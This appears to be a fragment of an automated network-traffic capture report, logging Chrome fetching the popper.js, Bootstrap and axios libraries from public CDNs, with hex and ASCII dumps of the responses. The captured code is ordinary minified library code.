                                                                                                                                          2024-11-28 10:32:17 UTC1369INData Raw: 65 2e 74 69 6d 65 6f 75 74 2b 22 6d 73 20 65 78 63 65 65 64 65 64 22 3b 65 2e 74 69 6d 65 6f 75 74 45 72 72 6f 72 4d 65 73 73 61 67 65 26 26 28 74 3d 65 2e 74 69 6d 65 6f 75 74 45 72 72 6f 72 4d 65 73 73 61 67 65 29 2c 6e 28 66 28 74 2c 65 2c 22 45 43 4f 4e 4e 41 42 4f 52 54 45 44 22 2c 6c 29 29 2c 6c 3d 6e 75 6c 6c 7d 2c 72 2e 69 73 53 74 61 6e 64 61 72 64 42 72 6f 77 73 65 72 45 6e 76 28 29 29 7b 76 61 72 20 67 3d 28 65 2e 77 69 74 68 43 72 65 64 65 6e 74 69 61 6c 73 7c 7c 63 28 79 29 29 26 26 65 2e 78 73 72 66 43 6f 6f 6b 69 65 4e 61 6d 65 3f 69 2e 72 65 61 64 28 65 2e 78 73 72 66 43 6f 6f 6b 69 65 4e 61 6d 65 29 3a 76 6f 69 64 20 30 3b 67 26 26 28 64 5b 65 2e 78 73 72 66 48 65 61 64 65 72 4e 61 6d 65 5d 3d 67 29 7d 69 66 28 22 73 65 74 52 65 71 75 65
                                                                                                                                          Data Ascii: e.timeout+"ms exceeded";e.timeoutErrorMessage&&(t=e.timeoutErrorMessage),n(f(t,e,"ECONNABORTED",l)),l=null},r.isStandardBrowserEnv()){var g=(e.withCredentials||c(y))&&e.xsrfCookieName?i.read(e.xsrfCookieName):void 0;g&&(d[e.xsrfHeaderName]=g)}if("setReque
                                                                                                                                          2024-11-28 10:32:17 UTC1369INData Raw: 68 69 73 2e 6e 61 6d 65 2c 64 65 73 63 72 69 70 74 69 6f 6e 3a 74 68 69 73 2e 64 65 73 63 72 69 70 74 69 6f 6e 2c 6e 75 6d 62 65 72 3a 74 68 69 73 2e 6e 75 6d 62 65 72 2c 66 69 6c 65 4e 61 6d 65 3a 74 68 69 73 2e 66 69 6c 65 4e 61 6d 65 2c 6c 69 6e 65 4e 75 6d 62 65 72 3a 74 68 69 73 2e 6c 69 6e 65 4e 75 6d 62 65 72 2c 63 6f 6c 75 6d 6e 4e 75 6d 62 65 72 3a 74 68 69 73 2e 63 6f 6c 75 6d 6e 4e 75 6d 62 65 72 2c 73 74 61 63 6b 3a 74 68 69 73 2e 73 74 61 63 6b 2c 63 6f 6e 66 69 67 3a 74 68 69 73 2e 63 6f 6e 66 69 67 2c 63 6f 64 65 3a 74 68 69 73 2e 63 6f 64 65 7d 7d 2c 65 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 32 29 3b 65 2e 65 78 70 6f 72 74 73 3d 72 2e 69 73 53 74 61 6e 64 61
                                                                                                                                          Data Ascii: his.name,description:this.description,number:this.number,fileName:this.fileName,lineNumber:this.lineNumber,columnNumber:this.columnNumber,stack:this.stack,config:this.config,code:this.code}},e}},function(e,t,n){"use strict";var r=n(2);e.exports=r.isStanda
                                                                                                                                          2024-11-28 10:32:17 UTC1369INData Raw: 22 72 65 74 72 79 2d 61 66 74 65 72 22 2c 22 75 73 65 72 2d 61 67 65 6e 74 22 5d 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 2c 69 2c 73 3d 7b 7d 3b 72 65 74 75 72 6e 20 65 3f 28 72 2e 66 6f 72 45 61 63 68 28 65 2e 73 70 6c 69 74 28 22 5c 6e 22 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 69 3d 65 2e 69 6e 64 65 78 4f 66 28 22 3a 22 29 2c 74 3d 72 2e 74 72 69 6d 28 65 2e 73 75 62 73 74 72 28 30 2c 69 29 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 72 2e 74 72 69 6d 28 65 2e 73 75 62 73 74 72 28 69 2b 31 29 29 2c 74 29 7b 69 66 28 73 5b 74 5d 26 26 6f 2e 69 6e 64 65 78 4f 66 28 74 29 3e 3d 30 29 72 65 74 75 72 6e 3b 22 73 65 74 2d 63 6f 6f 6b 69 65 22 3d 3d 3d 74 3f 73 5b 74 5d 3d 28 73 5b 74 5d
                                                                                                                                          Data Ascii: "retry-after","user-agent"];e.exports=function(e){var t,n,i,s={};return e?(r.forEach(e.split("\n"),function(e){if(i=e.indexOf(":"),t=r.trim(e.substr(0,i)).toLowerCase(),n=r.trim(e.substr(i+1)),t){if(s[t]&&o.indexOf(t)>=0)return;"set-cookie"===t?s[t]=(s[t]


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          14192.168.2.449759104.17.24.144432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:17 UTC388OUTGET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1
                                                                                                                                          Host: cdnjs.cloudflare.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:17 UTC953INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:17 GMT
                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Cache-Control: public, max-age=30672000
                                                                                                                                          ETag: W/"5eb03fa9-4af4"
                                                                                                                                          Last-Modified: Mon, 04 May 2020 16:15:37 GMT
                                                                                                                                          cf-cdnjs-via: cfworker/kv
                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                          Age: 1771645
                                                                                                                                          Expires: Tue, 18 Nov 2025 10:32:17 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7h03vIlKoG6rVcThNfibh9r7lYkP1iO2MBYPfOFpiCUZlERABkrk8CCkSIiotckMBxyJxhG4Pjb4vdbuPwX9iolAwHj7Dqom4Bz7oiODPnJDOv179DFpCSo8QYDtbHieGHgZhozr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Strict-Transport-Security: max-age=15780000
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e99b175de3f0f9c-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          2024-11-28 10:32:17 UTC416INData Raw: 34 61 66 34 0d 0a 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 37 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26
                                                                                                                                          Data Ascii: 4af4/* Copyright (C) Federico Zivolo 2017 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&
                                                                                                                                          2024-11-28 10:32:17 UTC1369INData Raw: 54 79 70 65 29 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 6f 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 74 3f 6f 5b 74 5d 3a 6f 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 27 48 54 4d 4c 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3f 65 3a 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 65 2e 68 6f 73 74 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 73 77 69 74 63 68 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7b 63 61 73 65 27 48 54 4d 4c 27 3a 63 61 73 65 27 42 4f 44 59 27 3a 72 65 74 75 72 6e 20 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 63 61 73 65 27 23 64 6f 63 75 6d 65 6e 74 27 3a 72 65 74 75 72
                                                                                                                                          Data Ascii: Type)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':retur
                                                                                                                                          2024-11-28 10:32:17 UTC1369INData Raw: 32 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 69 3d 61 28 74 2c 27 74 6f 70 27 29 2c 6e 3d 61 28 74 2c 27 6c 65 66 74 27 29 2c 72 3d 6f 3f 2d 31 3a 31 3b 72 65 74 75 72 6e 20 65 2e 74 6f 70 2b 3d 69 2a 72 2c 65 2e 62 6f 74 74 6f 6d 2b 3d 69 2a 72 2c 65 2e 6c 65 66 74 2b 3d 6e 2a 72 2c 65 2e 72 69 67 68 74 2b 3d 6e 2a 72 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 29 7b 76 61 72 20 6f 3d 27 78 27 3d 3d 3d 74 3f 27 4c 65 66 74 27 3a 27 54 6f 70 27 2c 69 3d 27 4c 65 66 74 27 3d 3d 6f 3f 27 52 69 67 68 74 27 3a 27 42 6f 74 74 6f 6d 27 3b 72 65 74 75 72 6e 20 70 61 72 73 65 46 6c 6f 61 74 28 65 5b 27 62 6f 72 64 65 72 27 2b 6f 2b 27
                                                                                                                                          Data Ascii: 2<arguments.length&&void 0!==arguments[2]&&arguments[2],i=a(t,'top'),n=a(t,'left'),r=o?-1:1;return e.top+=i*r,e.bottom+=i*r,e.left+=n*r,e.right+=n*r,e}function f(e,t){var o='x'===t?'Left':'Top',i='Left'==o?'Right':'Bottom';return parseFloat(e['border'+o+'
                                                                                                                                          2024-11-28 10:32:17 UTC1369INData Raw: 2d 73 2e 74 6f 70 2d 66 2c 6c 65 66 74 3a 70 2e 6c 65 66 74 2d 73 2e 6c 65 66 74 2d 6d 2c 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 29 3b 69 66 28 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 30 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 30 2c 21 69 26 26 72 29 7b 76 61 72 20 75 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 54 6f 70 2c 31 30 29 2c 62 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 4c 65 66 74 2c 31 30 29 3b 68 2e 74 6f 70 2d 3d 66 2d 75 2c 68 2e 62 6f 74 74 6f 6d 2d 3d 66 2d 75 2c 68 2e 6c 65 66 74 2d 3d 6d 2d 62 2c 68 2e 72 69 67 68 74 2d 3d 6d 2d 62 2c 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 75 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 62 7d 72 65 74 75 72 6e 28 69 3f 6f 2e 63
                                                                                                                                          Data Ascii: -s.top-f,left:p.left-s.left-m,width:p.width,height:p.height});if(h.marginTop=0,h.marginLeft=0,!i&&r){var u=parseFloat(a.marginTop,10),b=parseFloat(a.marginLeft,10);h.top-=f-u,h.bottom-=f-u,h.left-=m-b,h.right-=m-b,h.marginTop=u,h.marginLeft=b}return(i?o.c
                                                                                                                                          2024-11-28 10:32:17 UTC1369INData Raw: 65 69 67 68 74 7d 2c 62 6f 74 74 6f 6d 3a 7b 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 62 6f 74 74 6f 6d 2d 74 2e 62 6f 74 74 6f 6d 7d 2c 6c 65 66 74 3a 7b 77 69 64 74 68 3a 74 2e 6c 65 66 74 2d 70 2e 6c 65 66 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 7d 2c 64 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 73 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 73 65 28 7b 6b 65 79 3a 65 7d 2c 73 5b 65 5d 2c 7b 61 72 65 61 3a 45 28 73 5b 65 5d 29 7d 29 7d 29 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 61 72 65 61 2d 65 2e 61 72 65 61 7d 29 2c 61 3d 64 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 77 69 64 74 68 2c 69 3d 65
                                                                                                                                          Data Ascii: eight},bottom:{width:p.width,height:p.bottom-t.bottom},left:{width:t.left-p.left,height:p.height}},d=Object.keys(s).map(function(e){return se({key:e},s[e],{area:E(s[e])})}).sort(function(e,t){return t.area-e.area}),a=d.filter(function(e){var t=e.width,i=e
                                                                                                                                          2024-11-28 10:32:17 UTC1369INData Raw: 27 60 6d 6f 64 69 66 69 65 72 2e 66 75 6e 63 74 69 6f 6e 60 20 69 73 20 64 65 70 72 65 63 61 74 65 64 2c 20 75 73 65 20 60 6d 6f 64 69 66 69 65 72 2e 66 6e 60 21 27 29 3b 76 61 72 20 69 3d 74 5b 27 66 75 6e 63 74 69 6f 6e 27 5d 7c 7c 74 2e 66 6e 3b 74 2e 65 6e 61 62 6c 65 64 26 26 65 28 69 29 26 26 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 29 2c 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 29 2c 6f 3d 69 28 6f 2c 74 29 29 7d 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 29 7b 69 66 28 21 74 68 69 73 2e 73 74 61 74 65 2e 69 73 44 65 73 74 72 6f 79 65 64 29 7b 76 61 72 20 65 3d 7b 69 6e 73 74 61 6e 63 65 3a 74 68 69
                                                                                                                                          Data Ascii: '`modifier.function` is deprecated, use `modifier.fn`!');var i=t['function']||t.fn;t.enabled&&e(i)&&(o.offsets.popper=c(o.offsets.popper),o.offsets.reference=c(o.offsets.reference),o=i(o,t))}),o}function N(){if(!this.state.isDestroyed){var e={instance:thi
                                                                                                                                          2024-11-28 10:32:17 UTC1369INData Raw: 6f 6e 73 2e 72 65 6d 6f 76 65 4f 6e 44 65 73 74 72 6f 79 26 26 74 68 69 73 2e 70 6f 70 70 65 72 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 68 69 73 2e 70 6f 70 70 65 72 29 2c 74 68 69 73 7d 66 75 6e 63 74 69 6f 6e 20 42 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3b 72 65 74 75 72 6e 20 74 3f 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 77 69 6e 64 6f 77 7d 66 75 6e 63 74 69 6f 6e 20 48 28 65 2c 74 2c 6f 2c 69 29 7b 76 61 72 20 72 3d 27 42 4f 44 59 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2c 70 3d 72 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 65 3b 70 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6f 2c 7b 70 61 73 73 69 76 65 3a 21 30 7d
                                                                                                                                          Data Ascii: ons.removeOnDestroy&&this.popper.parentNode.removeChild(this.popper),this}function B(e){var t=e.ownerDocument;return t?t.defaultView:window}function H(e,t,o,i){var r='BODY'===e.nodeName,p=r?e.ownerDocument.defaultView:e;p.addEventListener(t,o,{passive:!0}
                                                                                                                                          2024-11-28 10:32:17 UTC1369INData Raw: 3d 74 7d 29 2c 6e 3d 21 21 69 26 26 65 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6e 61 6d 65 3d 3d 3d 6f 26 26 65 2e 65 6e 61 62 6c 65 64 26 26 65 2e 6f 72 64 65 72 3c 69 2e 6f 72 64 65 72 7d 29 3b 69 66 28 21 6e 29 7b 76 61 72 20 72 3d 27 60 27 2b 74 2b 27 60 27 3b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 27 2b 6f 2b 27 60 27 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 73 20 72 65 71 75 69 72 65 64 20 62 79 20 27 2b 72 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 6e 20 6f 72 64 65 72 20 74 6f 20 77 6f 72 6b 2c 20 62 65 20 73 75 72 65 20 74 6f 20 69 6e 63 6c 75 64 65 20 69 74 20 62 65 66 6f 72 65 20 27 2b 72 2b 27 21 27 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 27 65 6e 64
                                                                                                                                          Data Ascii: =t}),n=!!i&&e.some(function(e){return e.name===o&&e.enabled&&e.order<i.order});if(!n){var r='`'+t+'`';console.warn('`'+o+'`'+' modifier is required by '+r+' modifier in order to work, be sure to include it before '+r+'!')}return n}function K(e){return'end
                                                                                                                                          2024-11-28 10:32:17 UTC1369INData Raw: 3d 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 26 26 2d 31 21 3d 3d 5b 27 2b 27 2c 27 2d 27 5d 2e 69 6e 64 65 78 4f 66 28 74 29 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 3d 74 2c 70 3d 21 30 2c 65 29 3a 70 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 2b 3d 74 2c 70 3d 21 31 2c 65 29 3a 65 2e 63 6f 6e 63 61 74 28 74 29 7d 2c 5b 5d 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 56 28 65 2c 6e 2c 74 2c 6f 29 7d 29 7d 29 2c 61 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 69 29 7b 55 28 6f 29 26 26 28 6e 5b 74 5d 2b 3d 6f 2a 28 27 2d 27 3d 3d 3d 65 5b 69 2d 31 5d 3f 2d 31 3a 31 29 29 7d 29 7d 29 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 47 28 65 2c 74 29
                                                                                                                                          Data Ascii: =e[e.length-1]&&-1!==['+','-'].indexOf(t)?(e[e.length-1]=t,p=!0,e):p?(e[e.length-1]+=t,p=!1,e):e.concat(t)},[]).map(function(e){return V(e,n,t,o)})}),a.forEach(function(e,t){e.forEach(function(o,i){U(o)&&(n[t]+=o*('-'===e[i-1]?-1:1))})}),n}function G(e,t)
                                                                                                                                          2024-11-28 10:32:17 UTC1369INData Raw: 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 6f 29 2c 69 26 26 65 28 74 2c 69 29 2c 74 7d 7d 28 29 2c 70 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6f 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 6f 2c 65 7d 2c 73 65 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 66 6f 72 28 76 61 72 20 69 20 69 6e 20 74 3d 61 72 67 75 6d 65 6e 74 73 5b 6f 5d 2c 74 29 4f 62 6a
                                                                                                                                          Data Ascii: e(t.prototype,o),i&&e(t,i),t}}(),pe=function(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configurable:!0,writable:!0}):e[t]=o,e},se=Object.assign||function(e){for(var t,o=1;o<arguments.length;o++)for(var i in t=arguments[o],t)Obj


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          15192.168.2.449764104.18.10.2074432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:17 UTC382OUTGET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1
                                                                                                                                          Host: maxcdn.bootstrapcdn.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:17 UTC966INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:17 GMT
                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          CDN-PullZone: 252412
                                                                                                                                          CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                                                                          CDN-RequestCountryCode: US
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Cache-Control: public, max-age=31919000
                                                                                                                                          ETag: W/"14d449eb8876fa55e1ef3c2cc52b0c17"
                                                                                                                                          Last-Modified: Mon, 25 Jan 2021 22:04:04 GMT
                                                                                                                                          CDN-ProxyVer: 1.04
                                                                                                                                          CDN-RequestPullSuccess: True
                                                                                                                                          CDN-RequestPullCode: 200
                                                                                                                                          CDN-CachedAt: 09/24/2024 09:00:40
                                                                                                                                          CDN-EdgeStorageId: 1067
                                                                                                                                          timing-allow-origin: *
                                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          CDN-Status: 200
                                                                                                                                          CDN-RequestTime: 0
                                                                                                                                          CDN-RequestId: ca49da3fb29e07efbacf1b18db3e7dc9
                                                                                                                                          CDN-Cache: HIT
                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                          Age: 194295
                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e99b176ee306a57-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          2024-11-28 10:32:17 UTC403INData Raw: 37 62 65 64 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74
                                                                                                                                          Data Ascii: 7bed/*! * Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(t
                                                                                                                                          2024-11-28 10:32:17 UTC1369INData Raw: 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e
                                                                                                                                          Data Ascii: ine(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defin
                                                                                                                                          2024-11-28 10:32:17 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 74 28 6e 29 2e 74 72 69 67 67 65 72 28 65 2e 65 6e 64 29 7d 2c 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 28 65 29 7d 2c 69 73 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 28 74 5b 30 5d 7c 7c 74 29 2e 6e 6f 64 65 54 79 70 65 7d 2c 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 6e 29 69 66 28 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 73 29 29 7b 76 61 72 20 72 3d 6e 5b 73 5d 2c 6f 3d 65 5b 73 5d 2c 61 3d 6f 26 26 69 2e 69 73 45 6c
